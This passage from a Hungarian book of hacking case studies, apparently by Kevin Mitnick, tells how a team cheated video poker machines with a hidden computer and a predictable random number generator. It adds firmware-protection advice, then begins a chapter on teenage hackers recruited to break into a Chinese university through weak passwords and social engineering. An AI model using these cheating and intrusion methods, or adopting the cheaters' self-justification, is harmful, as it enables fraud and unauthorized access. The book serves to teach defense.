varrtuk, hogy elférjen a nagy lábujj körül. Majd lyukat vágtunk egy
Dr Scholl talpbetétbe, hogy a helyén maradjon a cipőben. Csak akkor
volt kényelmetlen, ha egész nap használtuk; akkor bizony kezdett
kínszenvedéssé válni a viselése.
Alex: – Szóval bemész a kaszinóba, megpróbálsz nyugodtnak
tűnni, mintha semmi nem lenne, nem lenne vezeték a nadrágodban.
Felmész, és elkezdesz játszani. Kifejlesztettünk egy kódot, a
morzejelekhez hasonló valamit. Beraksz egy csomó pénzt, hogy ne
kelljen folyton a pénzérméket dobálni a gépbe, majd elkezdesz
játszani. Amikor feljönnek a kártyák, a cipőben levőgombbal
beviszed, hogy milyen kártyák jelentek meg.
A gombból jövőjel a nadrágzsebben levőszámítógépbe megy. A
régebbi gépeknél általában hét vagy nyolc kártyára volt szükség, hogy
szinkronba kerüljünk. Öt kártyát kapsz a leosztással, ha kérsz még
hármat, mondjuk egy párt megtartva, az egyáltalán nem feltűnő,
megkapod a három kártyát, és akkor az összesen már nyolc.
Mike: – A cipőben levőgombon lekopogtatandó kód bináris volt, és
a Huffman-kódnak nevezett valamihez hasonló tömörítési technikát
használ. Így a hosszú-rövid egy-nullát, azaz bináris kettőt jelentett. A
hosszú-hosszú egy-egy a bináris hármat jelentette, és így tovább.
Egyetlen kártyához sem kellett háromnál több kopogtatás.
Alex: – Ha három másodpercig lenyomva tartottad a gombot, az
volt a törlés. És (a számítógép) apró jelzéseket adott, a brrr-brrr-brrr
például azt jelentette, hogy „OK, várom az adatokat”. Sokat
gyakoroltuk ezt – egyszerűen összpontosítani kellett és megtanulni,
hogy hogyan kell csinálni. Egy kis időután már úgy is tudtunk
kopogtatni, hogy közben a kaszinó egyik alkalmazottjával
beszélgettünk.
A nyolc kártyát azonosító kód begépelése elég volt ahhoz, hogy
körülbelül 99 százalékos biztonsággal szinkronba kerüljünk a géppel,
így néhány másodperc után, de legkésőbb egy percen belül a
számítógép háromszor berregett.
Készen álltam az akcióra.
A zsebszámítógép ekkorra megtalálta a leosztott kártyákat előállító
algoritmust. Mivel az algoritmus ugyanaz volt, mint a
videopókergépben, a számítógép minden egyes új leosztásnál tudta,
hogy milyen lapok jönnek majd, ha a játékos kiválasztja az eldobandó
lapjait, és jelzi, hogy mely lapokat kell megtartani a nyeréshez. Alex
így folytatta:
A számítógép a zsebben levővibrátoroknak jelet küldve mondta meg,
hogy mit kell tenni–, a vibrátorokat régi csipogókból szedtük ki. Ha a
számítógép azt akarja, hogy a harmadik és az ötödik kártyát tartsd
meg, azt csinálja, hogy bip, bip, bíííííp, bip, bíííííp, amit rezgésként
érzékelsz a zsebedben.
Kiszámoltuk, hogy ha óvatosan játszunk, akkor 40 százalék előnyünk
van minden leosztásnál. Ez óriási – a világ legjobb blackjack játékosai
2-2,5 százalékra jönnek ki.
Ha egy 5 dolláros gép előtt ülsz, és egyszerre öt érmét dobsz be,
percenként kétszer, akkor egy perc alatt 23 dollárt nyerhetsz. Fél óra
alatt könnyen megkereshetsz 1000 dolcsit. Az ember leül a géphez, és
minden egyes nap ilyen szerencséje lehet. Talán ha a gép elé ülőés
azzal félóráig játszó emberek 5 százaléka tudja ezt. De ők sem
játszanak nap mint nap. Mi pedig minden egyes alkalommal ebbe az 5
százalékba tartoztunk.
Ha bármikor nagy nyereményük volt egy kaszinóban, továbbálltak
egy másikba. Mindegyikük általában négy vagy öt kaszinót „tarolt le”
egymás után. Amikor egy hónappal később megint visszamentek
ugyanabba a kaszinóba, ügyeltek arra, hogy a nap egy másik szakában
menjenek, a személyzet egy másik váltásával találkozzanak, olyan
emberekkel, akik kevésbé valószínű, hogy felismerik őket. Ráadásul
más városokban – Renóban, Atlantic Cityben és egyéb helyeken – levő
kaszinókat is elkezdtek látogatni.
Az utak, a játék és a nyerés kezdett fokozatosan rutinná válni. Egyik
alkalommal azonban Mike azt hitte, hogy a mindegyikük által rettegett
pillanat elérkezett. Éppen emelte egy kicsit a tétet, és az első játéknál
tartott egy 25 dolláros gépnél, ami ugye növelte a feszültséget, mivel
minél nagyobb a gép értéke, annál jobban figyelik.
Egy kicsit izgultam, azonban a dolgok jobban mentek, mint
gondoltam. Viszonylag rövid időalatt körülbelül 5000 dollárt nyertem.
És ekkor ez a nagydarab, tiszteletet parancsoló fickó megpaskolta a
vállamat. Összeszoruló gyomorral felnéztem rá. Azt gondoltam
magamban: – Na, ez az.
– Észrevettem, hogy játszott egy kicsit – mondta. – Rózsaszínűt vagy
zöldet szeretne?
Ha én lettem volna ott, én azt gondoltam volna: – Mi ez –
kiválaszthatom, hogy milyen színű legyek, miközben péppé ver? – Azt
hiszem, minden pénzt otthagyva próbáltam volna elmenekülni. Mike
azt mondja, akkorra már elég dörzsölt volt ahhoz, hogy megőrizze a
hidegvérét.
A férfi így folytatta: – Egy ajándék kávéscsészét szeretnénk adni
önnek.
Mike a zöldet választotta.
Marcónak is megvolt a maga feszült pillanata. Éppen a nyerő
leosztásra várt, amikor egy – addig Marco által észre sem vett –
felügyelő mögéje lépett. – Ötezer dollárra duplázott – nem kis
szerencse – mondta, hangjában meglepetéssel. A szomszédos gépnél
ülő öreg nő a láncdohányosok érdes hangján megszólalt; – Ez... nem
szerencse volt... – A felügyelő megmerevedett, gyanút fogva figyelt.
–...hanem tökösség – károgta a nő. A felügyelő mosolygott és elsétált.
Körülbelül három évig a fiúk felváltva végezték tanácsadói
munkájukat, hogy megőrizzék tudásukat és kapcsolatrendszerüket,
illetve rendszeresen jártak a kaszinókba, hogy a pókerautomatáknál
megtömjék zsebüket. Vásároltak még két gépet, a legelterjedtebb
pókerautomatákat, és folyamatosan frissítették a szoftverüket.
Útjai során a csapat három utazó tagja különböző kaszinókat vett
célba, „nem csoportosan utaztak”, mondta Alex. – Egyszer vagy
kétszer kipróbáltuk ugyan, de butaság volt. – Noha volt közöttük egy
megállapodás, amelynek értelmében tudatták egymással, hogy ki merre
jár, alkalmanként némelyikük úgy surrant el a szerencsejáték-városok
egyikébe, hogy nem szólt a többinek. Mindazonáltal kaszinókra
korlátozták a játékot, soha nem próbálkoztak olyan helyeken, mint a 7-
Elevens vagy a szupermarketek, mert „ott nagyon kicsik voltak a
kifizetések”.

Elkaptak!

Alex és Mike igyekeztek fegyelmezettek maradni, és ragaszkodni


„bizonyos szabályokhoz, amelyekről tudtuk, hogy csökkentik annak
valószínűségét, hogy valaha is felfigyelnek ránk. Ilyen szabály volt az,
hogy egyetlen helyen sem szabad túl sok pénzt nyerni, egyetlen helyen
sem szabad túl sokszor nyerni, és nem szabad ugyanazt a helyet
egymás utáni napokon többször felkeresni.”
Mike még ennél is komolyabban vette a fegyelmezettséget, és úgy
érezte, hogy a másik kettő nem elég óvatos. Elfogadta, hogy óránként
kicsit kevesebbet nyer, és jobban hasonlít az átlagos játékosokhoz. Ha
két ász volt a leosztásban és a számítógép azt mondta, hogy dobja el
egyiket vagy akár mindkettőt egy még jobb leosztásért, mondjuk három
jumbóért, soha nem tette meg. Minden kaszinóban van minden
irányban mozgatható, zoomolható biztonsági kamerákat kezelő és
azokat figyelő személyzet, akik a kaszinó parkettja felett a képernyők
előtt ülnek, és csalók, megvesztegetett alkalmazottak és a temérdek
pénz által megkísértett egyéb személyek után kutatnak. Ha az egyik
ilyen szem valamilyen okból éppen az ő gépét figyelné, azonnal tudná,
hogy valami nem kerek, hiszen egyetlen épeszű játékos sem dob el egy
ászpárt. Csak az, aki csal, és tudja, hogy egy még jobb leosztás várja.
Alex nem volt ennyire óvatos. Marco pedig még kevésbé. Alex
szerint „Marco kicsit elbizakodott volt”:
Nagyon okos srác, mindent magától tanult meg, soha nem fejezte be
a középiskolát, de egyike volt a zseniális kelet-európai típusú
fickóknak. És ráadásul hivalkodó is volt.
Mindent tudott a számítógépekről, de az is a fejében volt, hogy a
kaszinók hülyék. Könnyű volt ezt hinni, hiszen hagytak minket ennyi
pénzzel elsétálni. Ennek ellenére azt hiszem, túlzottan magabiztossá
vált.
Mindennek fittyet hányt, ráadásul egyáltalán nem illet a képbe, mivel
pontosan úgy nézett ki, mint egy tizenéves külföldi. Úgy gondolom,
egyre inkább gyanút keltett. Ráadásul soha nem barátnővel vagy
feleséggel ment, ami segített volna, hogy egy kicsit jobban
beilleszkedjen a képbe.
Azt hiszem, végül olyan dolgokat csinált, amik felhívták rá a
figyelmet. Persze ahogy) telt az idő, mind egyre merészebbek lettünk,
felszabadultunk, és egyre inkább a jobb kifizetést nyújtó, drágább
gépekhez mentünk, és ez is egyre nagyobb kockázatot jelentett.
Noha Mike ezzel nem ért egyet, Alex azt sugallta, hogy mind a
hárman hazárdőrök voltak, akik tolták kifele a határokat, hogy lássák,
meddig mehetnek el. Ahogy ő mondta: – Úgy gondolom, alapjában
véve állandóan növeltük a kockázatot.
Eljött a nap, amikor az egyik percben Marco még az egyik kaszinó
egyik gépe előtt ült, a következő percben azonban tagbaszakadt
biztonságiak megragadták, és egy hátsó szobába vitték. Alex felidézi a
jelenetet;
Azért volt ijesztő, mert mindig hallani történeteket ezekről a
fickókról, akik a szart is kiverik az emberből. Ezek a fickók „a P...ba a
rendőrséggel, majd mi elintézzük” hozzáállásukról híresek.
Marco – bár rendkívül ideges volt – megőrizte keménységét. Részben
örültem, hogy ha már elkaptak bennünket, akkor éppen őt, mert azt
hiszem, ő volt a legjobban felkészülve arra, hogy kezelje ezt a helyzetet.
Mert tudom, hogy hogyan kezelte a dolgokat még Kelet-Európá-ban.
Lojális volt, nem adott fel bennünket. Semmilyen társról vagy
ilyesmiről nem beszélt. Ideges és zaklatott volt, de kemény maradt, és
tulajdonképpen annyit mondott, hogy egyedül dolgozott.
Azt mondta: – Nézzék, le vagyok tartóztatva, maguk rendőrök, vagy
mi a helyzet?
Ez tulajdonképpen egy rendészeti típusú kihallgatás, csak hát az
illetők nem rendőrök, és igazából nincsen semmilyen jogkörük, ami
kicsit furcsává teszi az egészet. Kérdezgették őt, de igazából nem
alkalmaztak erőszakot.
Alex elmesélte, hogy – mint a rendőrségen – Marcót lefényképezték,
elkobozták a számítógépét és az összes nála levő, körülbelül 7000
dollár készpénzt. Majd körülbelül egy órányi vagy kicsit több
kérdezősködés után – túl izgatott volt ahhoz, hogy pontosan
megmondja, mennyi idő telt el – végül elengedték.
Marco úton hazafelé már hívta társait. Kétségbeesettnek tűnt a
hangja. Annyit mondott: – El akarom mondani fiúk, hogy mi történt.
Elcsesztem.
Mike azonnal a főhadiszállásukra indult. – Alex és én rettegtünk,
amikor meghallottuk, hogy mi történt. Elkezdtem szétszedni a gépet, és
darabonként szórtam szét a városban.
Alex és Mike nem örültek annak, hogy Marco felesleges
kockázatokat vállalt. Ezek egyike az volt, hogy a gombot nem a
cipőjébe tette, mint a másik kettő, hanem makacsul ragaszkodott ahhoz,
hogy a készüléket a zakója zsebében hordja, és a kezével nyomkodta a
gombot. Alex úgy beszélt Marcóról, mint aki „azt gondolta, hogy a
biztonságiak olyan hülyék, hogy állandóan az orruk alá dughatja a
borítékot, benne az aznap nyert pénzzel”.
Alex meg van róla győződve, hogy – noha nem volt jelen – pontosan
tudja, mi történt. (Valójában a másik három nem tudott róla, hogy
Marco – a megbeszéltek ellenére – a többieket nem értesítve ment egy
kaszinókörútra.) Alex így képzeli a történteket: – Látták, hogy
hatalmas összeget nyer, és valamit folyton csinál a kezével. – Marco
egyszerűen nem foglakozott azzal, hogy vajon mi az, ami felkeltheti a
felügyelők figyelmét.
Alex számára ez a történet végét jelentette, noha nem teljesen biztos
benne, hogy a többiek is így voltak ezzel. – Az elején eldöntöttük,
hogyha valamelyikünket elkapják, mindannyian leállunk – mondta. –
Ezt – amennyire tudom – mindannyian betartottuk. – Majd egy pillanat
múlva, hangjában némi bizonytalansággal, hozzátette: – Legalábbis én
ehhez tartottam magam. – Mike hasonlóan nyilatkozott, azonban
Marcót egyikük sem kérdezte meg nyíltan.
A kaszinók általában nem tesznek feljelentést az olyan támadások
miatt, mint amilyet a fiúk is elkövettek. – Ennek az az oka, hogy nem
kívánják nyilvánosságra hozni, hogy ők is sebezhetők – magyarázza
Alex. Ezért általában annyi történik, hogy „takarodj a városból
naplemente előtt. Ha megígéred, hogy soha többé nem teszed be a
lábad a kaszinóba, akkor futni hagyunk.”

Utóhang

Körülbelül hat hónappal később Marco kapott egy levelet, amelyben


közölték, hogy az ellene felhozott vádakkal nem fordultak bírósághoz.
A négyek még ma is barátok, azonban nem olyan közeliek, mint a
régi időkben. Alex úgy számolta, hogy körülbelül 300000 dollárt nyert
a kalandon, amelynek egy részét a megállapodásnak megfelelően Larry
kapta meg. A három kaszinóba járó, akikre az összes kockázat hárult,
eredetileg megegyezett, hogy mindent egyenlően osztanak el egymás
között, de Alex úgy véli, hogy Mike és Marco egyenként 400 ezer és
félmillió dollár közötti összeget nyertek. Mike nem hajlandó elismerni,
hogy 300000 dollárnál többet nyert volna, de bevallotta, hogy Alex
valószínűleg kevesebbet keresett, mint ő.
Körülbelül három évig tartott a móka. A pénz ellenére Alex boldog
volt, hogy véget ért: – Megkönnyebbültem. A dolog szórakozás része
tökéletesen eltűnt. Teljesen munka jellege lett. Kockázatos munkáé. –
Mike sem bánkódott túlzottan, azt magyarázta, hogy „piszok döglesztő
lett az egész”.
Először mindketten vonakodtak attól, hogy elmeséljék történetüket,
később azonban nagy kedvvel beszéltek. És miért is ne tették volna?
Az azóta eltelt több mint tíz évben egyikük sem mesélt egy szót sem a
történtekről senkinek, kivéve a feleségeket és barátnőket. A teljes
névtelenség védelme mellett egyfajta megkönnyebbülés volt, hogy
mindent elmondhattak. Nyilvánvalóan élvezték a részletek
felelevenítését. Mike még azt is bevallotta, hogy „az életemben az
egyik legizgalmasabb dolog volt ez”.
Alex valószínűleg mindannyiuk nevében beszél, amikor elmondja a
kalandjukhoz való hozzáállását:
Nincs rossz érzésem a megnyert pénz miatt. Az iparág számára ez
csepp a tengerben. Hogy őszinte legyek: morálisan sosem éreztük
magunkat kényelmetlenül, mivel kaszinókról van szó.
Könnyű volt magunknak megmagyarázni. Kaszinóktól loptunk, akik
öreg nőktől loptak azáltal, hogy olyan játékokat kínáltak nekik,
amelyekben sohasem nyerhettek. Vegas olyan volt, mint pénzszívó
gépekre kapcsolt emberek városa, amely gépek negyeddolláronként
szívják el az életet, így mi úgy éreztük, hogy visszaszerzünk a Nagy
Testvértől, nem pedig egy idős nőjackpotját szakítjuk le.
Kiraknak egy játékot, amely így szól: „Ha a megfelelőkártyákat
választod ki, nyersz.” Mi a jó kártyákat választottuk ki. Egyszerűen
nem gondolták, hogy valaki képes lesz erre.
Alex azt mondja, hogy ma már nem próbálna ki ilyesmit. Ennek
azonban nem biztos, hogy az az oka, mint amit várnánk: – Más
módokon is tudok pénzt keresni. Ha olyan anyagi helyzetben lennék,
mint amilyenben akkor voltam, valószínűleg most is megpróbálnám. –
Jogosnak érzi, amit tettek.
Ebben a macska-egér játékban a macska folyton megismeri az egér
új trükkjeit, és megteszi a szükséges óvintézkedéseket. Napjainkban
sokkal jobban megírt szoftvert használnak a játékautomaták; a fiúk
egyáltalán nem biztosak benne, hogy ma is sikerülne nekik, ha
megpróbálnák feltörni őket.
Ennek ellenére soha nem lesz tökéletes megoldás a technikai-
biztonsági kérdésekre. Alex nagyon jól megfogalmazza a lényeget,
mondván, hogy „mindig, amikor [egy programozó] azt gondolja, hogy
senki nem veszi ezért a fáradságot, lesz Finnországban egy srác, aki
igenis veszi a fáradságot.”
És nem csak Finnországban, hanem Amerikában is.
BETEKINTÉS

Az 1990-es években a kaszinók és a játékautomaták készítői még


nem jöttek rá olyan dolgokra, amelyek később nyilvánvalóvá váltak.
Egy pszeud-véletlen szám generátor nem igazi véletlen számokat hoz
létre. Ehelyett azt teszi, hogy véletlen sorban tárol el egy számlistát.
Jelen esetben a lista igen hosszú; 2 a 32. hatványon, vagyis több mint
négymilliárd szám. A ciklus elején a szoftver véletlenszerűen kiválaszt
egy helyet a listában. Ezt követően azonban a következő játék
megkezdéséig a listában egymás után következő számokat használja.
A szoftver kódjának visszafejtésével a fiúk megszerezték a listát. A
„véletlen” lista bármely ismert pontjából meg tudták határozni az
abban a listában levő minden egyes soron következő számot, és az
adott gép iterációs sebességének ismeretében azt is meg tudták
állapítani, hogy hány perc és hány másodperc múlva jelenít meg a gép
egy royal flush-t.

ÓVINTÉZKEDÉSEK

A ROM chipeket és szoftvereket használó termékek gyártóinak fel


kell készülniük a biztonsági problémákra. És minden egyes szoftver és
számítógép alapú termékeket használó cég, vagyis napjainkban
gyakorlatilag az egyszemélyes élelmiszerboltokig bezárólag minden
vállalkozás számára veszélyes azt feltételezni, hogy a rendszereiket
építő szakemberek minden sebezhetőséget kivédtek. A japán
nyerőautomatában levő szoftver programozói ott hibáztak, hogy nem
gondolkodtak eléggé előre arról, hogy milyen támadásokra
számíthatnak. Semmilyen biztonsági intézkedést nem tettek arra
vonatkozóan, hogy a firmware-t megvédjék az illetéktelen kezektől. Fel
kellett volna készülniük arra, hogy valaki hozzáfér a géphez, eltávolítja
a ROM chipet, leolvassa a firmware-t, és a program utasításait
összerakva megmondja, hogyan működik a gép. Még ha mérlegelték is
e lehetőséget, valószínűleg azt feltételezték, hogy a gép működésének
pontos ismerete nem lesz elegendő, hiszen azt hitték, hogy a véletlen
szám generátor feltörésének számítási bonyolultsága minden kísérletet
meg fog akadályozni – ami lehet, hogy ma már igaz, akkoriban
azonban még nem így volt.
Ha az ön cége számítógépes chipeket tartalmazó hardvertermékeket
hoz piacra, mit kell tennie annak érdekében, hogy megfelelő
védelemmel lássa el azokat a szoftver iránt érdeklődő versenytárssal,
egy olcsó utánzatot készíteni kívánó külföldi céggel vagy egy önt
becsapni készülő hackerrel szemben?
Az első lépés: tegye nehézzé a firmware-hez való hozzáférést.
Többféle megközelítés létezik, többek között:
Olyan típusú chipeket vásároljon, amelyeket úgy alakítottak ki, hogy
védettek legyenek a támadások ellen. Több cég is kínál olyan chipeket,
amelyeket olyan helyzetekben lehet használni, amikor nagy a támadás
veszélye.
Használjon chip on-board szerelési technikát – ez olyan kialakítás,
amelyben a chip az áramkörkártyára van beágyazva, és nem távolítható
el külön elemként.
Epoxigyantával ragassza a chipet a kártyához, így ha megkísérlik
eltávolítani, a chip el fog törni. E technikának továbbfejlesztett
változata, amikor alumíniumport helyeznek az epoxigyantába: ha a
támadó a gyanta felmelegítésével kísérli meg eltávolítani a chipet, az
alumínium tönkreteszi azt.
Használjon hall grid array (BGA) tokozást. Ennél az elrendezésnél a
csatlakozók nem a chip oldalán, hanem a chip alatt jönnek ki,
megnehezítve, sőt inkább lehetetlenné téve azt, hogy valaki
megszerezze a chipből jövő jeleket, miközben a chip a kártyán van.
Egy másik szóba jöhető óvintézkedés, ha minden azonosító jellegű
információt lekaparunk a chipről, így a támadót megfosztjuk a chip
gyártójára és típusára vonatkozó minden nyomtól. Viszonylag elterjedt
gyakorlat, amit a történetben levő gép gyártói is használtak, az
ellenőrző összeg (checksum) használata – ellenőrző összeg rutin
beépítése a szoftverbe. Ha a programot módosítják, az ellenőrző összeg
nem a megfelelő lesz, és a szofrver nem fogja működtetni a gépet.
Persze egy ezt a megközelítést ismerő képzett hacker egyszerűen
ellenőrzi, hogy a szoftverben van-e ellenőrző összeg rutin, és ha talál
ilyet, kikapcsolja. Ezért egy vagy több, a chipet fizikailag védő
módszer alkalmazása sokkal célszerűbb lehet.

ZÁRÓJELBEN

Ha a firmware saját fejlesztésű és értékes, a legjobb biztonsági


források használatával tudja meg, hogy jelen pillanatban milyen
technikákat használnak a hackerek. Tartsa naprakészen a tervezők és a
programozók tudását. És mindig figyeljen arra, hogy a megfelelő
lépések végrehajtásával a lehető legmagasabb biztonsági szintet érje el.

2. Fejezet

Amikor terroristák hívnak


Nem tudom, miért nem tudtam abbahagyni. A megrögzött
természetem? Pénzéhség? Hatalomvágy? Számtalan lehetséges okot
meg tudok nevezni.
ne0h
A 20 éves, Elvtársként bejelentkező hacker jelenleg a Miami egyik
vonzó részén levő, a testvérével közösen birtokolt házban lebzsel. Az
édesapjuk velük lakik, de pusztán azért, mert az Elvtárs öccse
fiatalkorú, és a gyámhatóság ragaszkodik hozzá, hogy 18 éves koráig
egy felnőttel éljen. A fiúkat mindez nem zavarja, és apának saját lakása
van valahol máshol, ahova majdan vissza fog költözni.
Elvtárs mamája két éve halt meg, és a házat a fiaira hagyta, mivel ő
és a fiúk apja elváltak. Némi készpénz is maradt utána. A testvére
középiskolába jár, de Elvtárs „egyszerűen csak itt lakik”. A családjának
nagy része elítéli ezt, mondja, de „nem igazán érdekel”. Ha valaki ilyen
fiatalon börtönbe kerül – tulajdonképpen ő a szövetségi vádak alapján
valaha elítélt legfiatalabb hacker – hajlamos átértékelni a dolgokat.
A hackelésnek természetesen nincsenek nemzetközi határai, így sem
Elvtársnak, sem barátjának, ne0h-nak sem különösebben furcsa, hogy
ne0h mintegy 3000 mérföldre él tőle. A hackelés hozta őket össze, és a
hackelés volt az, ami olyan sikamlós területre vitte őket, hogy – mint
később gyanították – szigorúan titkos számítógépes rendszerekben
betörve a nemzetközi terrorizmust szolgálták. Napjainkban ez igen
komoly lelki terhet jelent.
Az Elvtársnál egy évvel idősebb ne0h „azóta használ
számítógépeket, amióta el tudja érni a billentyűzetet”. Édesapja
számítástechnikai boltot vezet, és minden ügyféltalálkozójára magával
vitte a fiatal fiút; a srác a tárgyalások alatt az apja ölében ült. Tizenegy
éves korára dBase kódokat írt az apja üzlete számára.
Valamikor akkoriban ne0h kezébe jutott a Takedown című könyv (a
teljes címe: Takedown: The Pursuit and Capture of Kevin Mitnick,
Hyperion Press, 1996) egy példánya – ez egy igen felületes beszámoló
saját hackeléseimről, hároméves menekülésemről és arról, ahogy az
FBI keresett engem, ne0h-t magával ragadta a könyv:
Ösztönöztél engem. Te vagy a kib…tt mentorom. Mindent elolvastam
arról, amit tettél. Olyan híresség akartam lenni, mint te.
Ez a motiváció vette rá a hackelésre. Számítógépekkel és hálózati
hubokkal, illetve egy kétméteres kalózzászlóval díszítette fel a
szobáját, és elindult a nyomdokaimban, ne0h magas szintű
hackertudást és -képességeket kezdett összeszedni. A tudás jött először;
a megfontoltság általában csak később jelentkezik. A hackerek által a
még mindig kezdőnek számító fiatalra használt kifejezést említve
meséli: – Amikor szkriptkölyök voltam, weboldalakat törtem fel és a
valódi e-mail címemet tettem fel rájuk.
Internet Relay Chat (IRC) oldalakon lebzselt – ezek olyan szöveg
alapú internetes csevegőszobák, ahol a hasonló érdeklődésű emberek
online találkoznak, és valós időben cserélhetnek információt műlegyes
horgászásról, antik repülőgépekről, főzésről és még sok ezer egyéb
témáról, többek között a hackelésről. Amikor egy IRC oldalon
begépeljük az üzenetet, minden online felhasználó látja amit írtunk, és
válaszolhat rá. Noha az IRC-t rendszeresen használók nagy része nincs
tisztában vele, a kommunikáció egyszerűen naplózható. Azt gyanítom,
hogy a naplóknak mostanra legalább annyi szót kell tartalmazniuk,
mint a kongresszusi könyvtár összes könyvének – és a nagy sietve, az
utókorra való minden tekintet nélkül beírt szöveg akár évekkel később
is visszakereshető.
Elvtárs részben ugyanazokon az IRC oldalakon múlatta az idejét,
mint ne0h, így távolsági barátságba elegyedtek. A hackerek gyakran
alkotnak szövetséget, amelynek keretében információt cserélnek és
csoportos támadásokat hajtanak végre, ne0h, Elvtárs és egy másik
kölyök elhatározták, hogy megalakítják a saját csoportjukat, amit
„Keebler Elves”-nek (Keebler manók) neveztek. (A Keebler egy
keksz– és süteménymárka.) Néhány további hackernek is
megengedték, hogy részt vegyenek a csoport beszélgetéseiben, de a
három alapító tag nem tájékoztatta a többieket a rossz szándékú,
feketekalapos támadásaikról. – Kormányzati oldalakra törtünk be
szórakozásból – mondta Elvtárs. Úgy becsüli, hogy összesen „néhány
száz” biztonságosnak hitt kormányzati oldalra törtek be.
Számos olyan IRC csatorna van, ahol a különböző típusú hackerek
összegyűlnek. Ezek egyike, az Efnetnek nevezett hálózat egy olyan
oldal, amit Elvtárs így ír le: „nem kifejezetten a számítógépes alvilág,
csupán szerverek igen nagy csoportja”. Az Efneten belül azonban
vannak kevésbé ismert csatornák, helyek, amelyeket saját magától
senki nem találna meg, csak ha egy másik feketekalapos, akinek a
bizalmát bírja, megmutatja őket. Ezek a csatornák, ahogy Elvtárs
mondja, „elég alvilágiak” voltak.

Khalid, a terrorista belógatja a csalit

Úgy 1998 körül ezeken az „elég alvilági” csatornákon Elvtárs


elkezdett olyan beszélgetésekkel találkozni, amelyek egy RahulB
névvel ott „lebzselő” fickóról szóltak. (Később a Rama3456 nevet is
használta.) – Köztudott volt, hogy olyan hackereket keres, akik
kormányzati és katonai számítógépekbe törnek be –.gov és.mil
oldalakra – meséli Elvtárs. – Olyan pletyka terjedt, hogy Bin Ladennek
dolgozott. Ez szeptember 11. előtt volt, így a Bin Laden nevet
akkoriban még nem lehetett mindennap hallani a hírekben.
Végül Elvtárs és a titokzatos ember útjai keresztezték egymást;
Elvtárs Khalid Ibrahimként ismerte meg a férfit. – Beszéltem vele
néhányszor IRC-n, és egyszer telefonon is beszéltünk. – A férfinak
idegen akcentusa volt, és „határozottan úgy hangzott, mintha
tengerentúli kapcsolat lenne”.
ne0h is célkeresztbe került; Khalid vele sokkal közvetlenebb és
kevésbé titkolódzó volt, ne0h így emlékszik vissza:
Úgy 1999 körül e-mailt kaptam egy férfitől, aki milicistának nevezte
magát, és azt mondta, hogy Pakisztánban van. A Khalid Ibrahim nevet
adta meg. Azt mondta, hogy a pakisztáni milicistáknak dolgozik.
Ha valaki naiv kölyökhackereket keres, vajon terroristának fogja
magát kiadni – még ha mindez szeptember 11. előtt történt is? Első
pillantásara ez abszurdnak tűnik. A férfi később azt állította, hogy az
Egyesült Államokban járt iskolába, maga is hackelt egy kicsit, és
hackerekkel társult, amikor az országban élt, így ismerhette, vagy azt
gondolhatta, hogy ismeri a hackerek gondolkodását. Valamilyen
mértékben minden hacker lázadó, aki a szokásostól eltérő normák
mentén él, és élvezi, ha legyőzheti a rendszereket. Ha valaki el akarja
húzni a hackerek előtt a mézesmadzagot, talán nem is akkora butaság
azt állítani, hogy ő egy szabályszegő kívülálló. Talán sokkal hihetőbbé
teszi a történetet, a szándékolt cinkostársakat pedig sokkal óvatlanabbá
és kevésbé gyanakvóvá.
És akkor ott volt még a pénz. Khalid 1000 dollárt ajánlott ne0h-nak,
ha feltöri egy kínai egyetem számítógépes hálózatát, és átadja neki a
diákok adatbázisfájlját, ne0h úgy említi ezt az intézményt, mint Kína
MIT-jét. (Az MIT, azaz a Massachusetts Institute of Technology neves
amerikai műszaki egyetem.) Ez valószínűleg próba volt: ne0h hackelési
képességeinek és találékonyságának próbája. Hogyan lesz képes
meghackelni egy számítógéprendszert, ha nem képes olvasni a nyelvet?
Azonban ami ennél is nehezebb ügy: Hogyan lehet social engineer
módszereket használni, ha nem beszéli a nyelvet?
Kiderült, hogy a nyelv egyáltalán nem akadály ne0h-nak. Elkezdett
egy a gLobaLheLL nevű hackercsoport által használt IRC oldalt
látogatni, és a csoporton keresztül kapcsolatba került az egyetem egyik
informatikus hallgatójával. Kért a diáktól néhány felhasználói nevet és
jelszót. A bejelentkezési információ rövidesen megérkezett – két
hacker egymás között, nincs szükség kérdésekre, ne0h látta, hogy az
egyetem számítógépes biztonsága valahol a szörnyű és a katasztrofális
között lebeg, ami akkor különösen meglepő, ha belegondolunk, hogy
egy olyan műszaki egyetemről van szó, ahol illene jobban ismerni az
ilyen dolgokat. A legtöbb diák a felhasználói névvel megegyező
jelszavakat választott – ugyanazt a szót vagy kifejezést használták
mindkettőre.
A diák által megadott lista elégséges volt ahhoz, hogy hozzáférést
adjon ne0h-nak, aki így elkezdhetett elektronikusan körülszaglászni –
hacker nyelven ezt snifingnek nevezik. Talált egy diákot, nevezzük
Changnak, aki az Egyesült Államokban levő FTP-khez fért hozzá.
Ezen FTP-k között volt egy „warez” oldal – vagyis egy olyan hely,
ahonnan feltört szoftvereket lehet letölteni. ne0h – a szokásos social
engineering trükköt használva – az egyetemi hálózaton kószálva
összeszedett némi helyi, az egyetemistákra jellemző zsargont. Ez
egyszerűbb volt, mint ahogy elsőre hangzik, mivel ne0h szerint „a
legtöbbjük beszél angolul”. Ezt követően kapcsolatba lépett Changgal,
egy olyan felhasználói nevet használva, amelyről Chang azt
gondolhatta, hogy ne0h az egyetemi gépteremből írt neki.
– A 213-as blokkba tartozom – mondta Changnak elektronikusan, és
egy teljesen egyenes kérdést tett fel, diákok neve és e-mail címe iránt
érdeklődve, mint bármely más diák, aki osztálytársakkal akar
kapcsolatba kerülni. Mivel a jelszavak többsége nagyon egyszerű volt,
nem okozott túl nagy fejtörést, hogy bejusson a diákok fájljaiba.
Rövidesen körülbelül száz diákról küldött adatbázist Khalidnak. –
Átadtam neki, mire ő azt mondta: „Pontosan erre volt szükségem.” –
Khalid elégedett volt; nyilvánvalóan egyáltalán nem kellettek neki a
nevek; látni akarta mindössze, hogy ne0h képes-e megszerezni ilyen
távoli forrásból az információkat. – Nagyjából így kezdődött a
kapcsolatunk – összegzi ne0h. – Meg tudtam csinálni a feladatot, tudta,
hogy meg tudom csinálni a feladatot, így egyéb dolgokat kezdett kérni
tőlem.
Azt mondva ne0h-nak, hogy figyelje postaládáját az ezer dollár
miatt, Khalid elkezdte körülbelül hetente egyszer mobiljáról hívni,
„általában miközben vezetett”. A következő megbízás az indiai Bhabha
atomkutatási központ számítógépes rendszerének meghackelése volt. A
központ Sun munkaállomásokat használt, ami ismerős alap minden
hackernek, ne0h elég könnyen bejutott, azonban azt találta, hogy a
gépen semmilyen érdekes információ nincsen, és úgy tűnt, hogy egy
különálló, a hálózathoz nem csatlakoztatott gépről van szó. Khalidot
látszólag nem zavarta ez a kudarc.
